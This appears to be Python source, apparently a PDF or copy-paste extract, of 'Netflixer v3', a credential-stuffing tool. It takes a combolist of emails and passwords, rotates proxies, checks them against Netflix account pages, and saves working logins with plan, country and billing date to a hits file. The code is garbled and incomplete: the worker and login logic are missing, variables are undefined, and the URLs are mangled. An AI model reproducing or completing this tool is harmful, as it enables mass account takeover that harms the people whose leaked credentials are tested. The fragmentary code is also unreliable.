Message
Message
class Netflixer:
def __init__(self):
self.proxies = []
self.combos = []
self.hits = 0
self.bad = 0
self.cpm = 0
self.retries = 0
self.lock = threading.Lock()
def ui(self):
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[NETFLIXER v3] - Made by
Plasmonix')
text = '''
███▄ █ ▓█████▄▄▄█████▓ █████▒██▓ ██▓▒██ ██▒▓█████
██▀███
██ ▀█ █ ▓█ ▀▓ ██▒ ▓▒▓██ ▒▓██▒ ▓██▒▒▒ █ █ ▒░▓█ ▀
▓██ ▒ ██▒
▓██ ▀█ ██▒▒███ ▒ ▓██░ ▒░▒████ ░▒██░ ▒██▒░░ █ ░▒███
▓██ ░▄█ ▒
▓██▒ ▐▌██▒▒▓█ ▄░ ▓██▓ ░ ░▓█▒ ░▒██░ ░██░ ░ █ █ ▒ ▒▓█ ▄
▒██▀▀█▄
▒██░ ▓██░░▒████▒ ▒██▒ ░ ░▒█░ ░██████▒░██░▒██▒
▒██▒░▒████▒░██▓ ▒██▒
░ ▒░ ▒ ▒ ░░ ▒░ ░ ▒ ░░ ▒ ░ ░ ▒░▓ ░░▓ ▒▒ ░ ░▓ ░░░ ▒░ ░░
▒▓ ░▒▓░
░ ░░ ░ ▒░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ▒ ░░░ ░▒ ░ ░ ░ ░
░▒ ░ ▒░
░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░
░░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ '''
faded = ''
red = 40
for line in text.splitlines():
faded += (f"\033[38;2;{red};0;220m{line}\033[0m\n")
if not red == 255:
red += 15
if red > 255:
red = 255
print(center(faded))
print(center(f'{Fore.LIGHTYELLOW_EX}\ngithub.com/Plasmonix Version 3.0\
n{Fore.RESET}'))
def cpmCounter(self):
while True:
old = self.hits
time.sleep(4)
new = self.hits
self.cpm = (new-old) * 15
def updateTitle(self):
while True:
elapsed = time.strftime('%H:%M:%S', time.gmtime(time.time() -
self.start))
ctypes.windll.kernel32.SetConsoleTitleW(f'[NETFLIXER v3] - Hits:
{self.hits} | Bad: {self.bad} | Retries: {self.retries} | CPM: {self.cpm} |
Threads: {threading.active_count() - 2} | Time elapsed: {elapsed}')
time.sleep(0.4)
def getProxies(self):
try:
print(f'[{Fore.LIGHTBLUE_EX}>{Fore.RESET}] Path to proxy file> ')
path = easygui.fileopenbox(default='*.txt', filetypes = ['*.txt'],
title= 'Netflixer - Select proxy', multiple= False)
open(path, "r", encoding="utf-8")
if choice == 0:
proxytype = 'https'
elif choice == 1:
proxytype = 'socks4'
elif choice == 2:
proxytype = 'socks5'
else:
print(f'[{Fore.RED}!{Fore.RESET}] Please enter a valid choice such
as 0, 1 or 2!')
os.system('pause >nul')
quit()
except ValueError:
print(f'[{Fore.LIGHTRED_EX}!{Fore.RESET}] Value must be an integer')
os.system('pause >nul')
quit()
except Exception as e:
print(f'[{Fore.LIGHTRED_EX}!{Fore.RESET}] Failed to open proxyfile')
os.system('pause >nul')
quit()
def getCombos(self):
try:
print(f'[{Fore.LIGHTBLUE_EX}>{Fore.LIGHTWHITE_EX}] Path to combolist>
')
path = easygui.fileopenbox(default='*.txt', filetypes = ['*.txt'],
title= 'Netflixer - Select combos', multiple= False)
with open(path, 'r', encoding="utf-8") as f:
for l in f:
self.combos.append(l.replace('\n', ''))
except:
print(f'[{Fore.LIGHTRED_EX}!{Fore.RESET}] Failed to open combofile')
os.system('pause >nul')
quit()
else:
info = client.get("https://www.netflix.com/YourAccount", headers
={"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9" ,"Accept-Encoding": "gzip, deflate,
br" ,"Accept-Language": "en-US,en;q=0.9" ,"Connection": "keep-alive" ,"Host":
"www.netflix.com" ,"Referer": "https://www.netflix.com/browse" ,"Sec-Fetch-Dest":
"document" ,"Sec-Fetch-Mode": "navigate" ,"Sec-Fetch-Site": "same-origin" ,"Sec-
Fetch-User": "?1" ,"Upgrade-Insecure-Requests": "1" ,"User-Agent": "Mozilla/5.0
(iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like
Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"}, cookies =cookie, proxies
=random.choice(self.proxies), timeout =10).text
plan = info.split('data-uia="plan-label"><b>')[1].split('</b>')[0]
country = info.split('","currentCountry":"')[1].split('"')[0]
expiry = info.split('data-uia="nextBillingDate-item">')
[1].split('<')[0]
self.lock.acquire()
print(f'[{Fore.LIGHTGREEN_EX}+{Fore.RESET}]
{Fore.LIGHTBLUE_EX}HIT{Fore.RESET} | {email} | {password} | {plan} | {country} |
{expiry}')
self.hits += 1
with open('hits.txt', 'a', encoding='utf-8') as fp:
fp.writelines(f'Email: {email} Pass: {password} - Plan: {plan}
- Country: {country} - Validity: {expiry}\n')
self.lock.release()
except:
self.lock.acquire()
print(f'[{Fore.LIGHTRED_EX}!{Fore.RESET}]
{Fore.LIGHTRED_EX}ERROR{Fore.RESET} | Proxy timeout. Change your proxies or use a
different VPN')
self.retries += 1
self.lock.release()
def main(self):
self.ui()
self.getProxies()
self.getCombos()
try:
self.threadcount = int(input(f'[{Fore.LIGHTBLUE_EX}>{Fore.RESET}]
Threads> '))
except ValueError:
print(f'[{Fore.LIGHTRED_EX}!{Fore.RESET}] Value must be an integer')
os.system('pause >nul')
quit()
self.ui()
self.start = time.time()
threading.Thread(target =self.cpmCounter, daemon =True).start()
threading.Thread(target =self.updateTitle ,daemon =True).start()
threads = []
self.check = [0 for i in range(self.threadcount)]
for i in range(self.threadcount):
sliced_combo = self.combos[int(len(self.combos) / self.threadcount *
i): int(len(self.combos)/ self.threadcount* (i+1))]
t = threading.Thread(target= self.worker, args= (sliced_combo, i,) )
threads.append(t)
t.start()
for t in threads:
t.join()
print(f'[{Fore.LIGHTGREEN_EX}+{Fore.RESET}] Task completed')
os.system('pause>nul')
n = Netflixer()
n.main()